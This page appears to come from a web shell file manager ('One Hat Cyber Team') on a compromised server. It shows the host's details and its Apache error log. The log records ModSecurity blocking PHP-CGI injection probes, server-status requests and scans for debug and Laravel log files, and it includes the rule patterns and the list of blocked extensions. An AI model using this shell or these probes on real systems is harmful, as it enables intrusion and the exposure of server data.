⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.81
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Server Software:
Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.25
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
apache
/
domlogs
/
View File Name :
web.dev-unit.com.error.log
[Wed Sep 24 06:35:48.408003 2025] [:error] [pid 11124:tid 11148] [client 139.59.136.184:55490] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "web.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aNNnFI2t0Zs36xpTd8oTGAAAANY"] [Wed Sep 24 06:35:49.822816 2025] [authz_core:error] [pid 11124:tid 11141] [client 139.59.136.184:55544] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Wed Sep 24 06:35:50.421808 2025] [:error] [pid 11124:tid 11147] [client 209.38.208.202:36776] [client 209.38.208.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "web.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aNNnFo2t0Zs36xpTd8oTIgAAANU"] [Wed Sep 24 06:35:52.433551 2025] [authz_core:error] [pid 11124:tid 11138] [client 209.38.208.202:56040] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Sat Oct 04 19:02:27.454722 2025] [:error] [pid 2353:tid 2482] [client 138.197.68.6:49504] [client 138.197.68.6] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/dev-unit.com"] [unique_id "aOFFE0cQ3spZoHDxuzVVuAAAAJg"], referer: https://web.dev-unit.com/dev-unit.com/ [Mon Oct 06 10:52:31.871161 2025] [autoindex:error] [pid 18173:tid 18262] [client 20.171.207.20:52728] AH01276: Cannot serve directory /home/id/dev-unit.com/devweb-lastV/public/storage/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Oct 06 10:53:14.714231 2025] [:error] [pid 18322:tid 18329] [client 20.171.207.20:50396] [client 20.171.207.20] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/dev-unit.com"] [unique_id "aON1athaPC8EJpc008b5FAAAAMU"] [Mon Oct 06 10:53:27.269153 2025] [:error] [pid 18322:tid 18343] [client 20.171.207.20:50396] [client 20.171.207.20] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/services/dev-unit.com"] [unique_id "aON1d9haPC8EJpc008b5NgAAANM"] [Mon Oct 06 10:53:29.615020 2025] [:error] [pid 18322:tid 18340] [client 20.171.207.20:50396] [client 20.171.207.20] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/solutions/dev-unit.com"] [unique_id "aON1edhaPC8EJpc008b5OwAAANA"] [Mon Oct 06 10:53:33.542907 2025] [:error] [pid 18173:tid 18281] [client 20.171.207.20:38374] [client 20.171.207.20] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/dev-unit.com"] [unique_id "aON1fTE00rmm21TBTjUlqQAAAJU"] [Mon Oct 06 10:53:38.103294 2025] [core:error] [pid 18173:tid 18260] [client 20.171.207.20:38386] AH10244: invalid URI path (/dev-style/js/%url%) [Sat Nov 01 23:24:48.246355 2025] [:error] [pid 351:tid 418] [client 74.7.227.84:47858] [client 74.7.227.84] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/dev-unit.com"] [unique_id "aQZ6oCWqIQnoORzbQ4pbjgAAAEU"] [Sat Nov 01 23:25:21.262141 2025] [:error] [pid 350:tid 409] [client 74.7.227.84:44598] [client 74.7.227.84] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/services/dev-unit.com"] [unique_id "aQZ6wShJ8wy1c6wbFddITQAAABg"] [Sat Nov 01 23:25:25.944132 2025] [:error] [pid 350:tid 408] [client 74.7.227.84:44598] [client 74.7.227.84] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/solutions/dev-unit.com"] [unique_id "aQZ6xShJ8wy1c6wbFddIUQAAABc"] [Sat Nov 01 23:25:31.425113 2025] [:error] [pid 350:tid 405] [client 74.7.227.84:44598] [client 74.7.227.84] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/dev-unit.com"] [unique_id "aQZ6yyhJ8wy1c6wbFddIVgAAABQ"] [Sat Nov 01 23:25:37.726819 2025] [core:error] [pid 352:tid 424] [client 74.7.227.84:54642] AH10244: invalid URI path (/dev-style/js/%url%) [Sat Nov 01 23:27:03.860936 2025] [autoindex:error] [pid 351:tid 463] [client 74.7.227.84:54644] AH01276: Cannot serve directory /home/id/dev-unit.com/devweb-lastV/public/storage/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 23 00:54:34.352946 2025] [:error] [pid 31624:tid 31677] [client 164.90.208.56:35526] [client 164.90.208.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "web.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aSI_KlPVkOuVaKzHUedm2QAAAFc"] [Sun Nov 23 00:54:37.514868 2025] [authz_core:error] [pid 31624:tid 31655] [client 164.90.208.56:35592] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Sun Nov 23 00:54:51.546701 2025] [:error] [pid 31567:tid 31613] [client 209.38.208.202:51008] [client 209.38.208.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "web.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aSI_O9k8yt675SVHtMGuWgAAAVE"] [Sun Nov 23 00:54:56.533336 2025] [authz_core:error] [pid 31567:tid 31619] [client 209.38.208.202:49224] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Mon Nov 24 05:10:32.211928 2025] [:error] [pid 3455:tid 3483] [client 194.180.49.174:61074] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/tmp/debug.log"] [unique_id "aSPMqMttBIXSrONIutcjoQAAARg"] [Mon Nov 24 05:10:32.322350 2025] [:error] [pid 29580:tid 29626] [client 194.180.49.174:61082] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/logs/debug.log"] [unique_id "aSPMqHH8vjLOEpcfaW5qtAAAAEk"] [Mon Nov 24 05:10:32.403085 2025] [:error] [pid 29580:tid 29619] [client 194.180.49.174:61094] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/php_error.log"] [unique_id "aSPMqHH8vjLOEpcfaW5qtQAAAEM"] [Mon Nov 24 05:10:32.521481 2025] [:error] [pid 3455:tid 3469] [client 194.180.49.174:61108] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/debug.log"] [unique_id "aSPMqMttBIXSrONIutcjowAAAQo"] [Mon Nov 24 05:10:32.661880 2025] [:error] [pid 3455:tid 3459] [client 194.180.49.174:61124] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/logs/error.log"] [unique_id "aSPMqMttBIXSrONIutcjpAAAAQA"] [Mon Nov 24 05:10:32.808050 2025] [:error] [pid 3455:tid 3476] [client 194.180.49.174:61130] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/laravel.log"] [unique_id "aSPMqMttBIXSrONIutcjpQAAARE"] [Mon Nov 24 05:10:32.946957 2025] [:error] [pid 3455:tid 3472] [client 194.180.49.174:61136] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/logs/debug.log"] [unique_id "aSPMqMttBIXSrONIutcjpgAAAQ0"] [Mon Nov 24 05:10:33.033301 2025] [:error] [pid 3455:tid 3470] [client 194.180.49.174:61152] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aSPMqcttBIXSrONIutcjqAAAAQs"] [Mon Nov 24 05:10:33.106925 2025] [:error] [pid 29782:tid 29804] [client 194.180.49.174:61160] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag 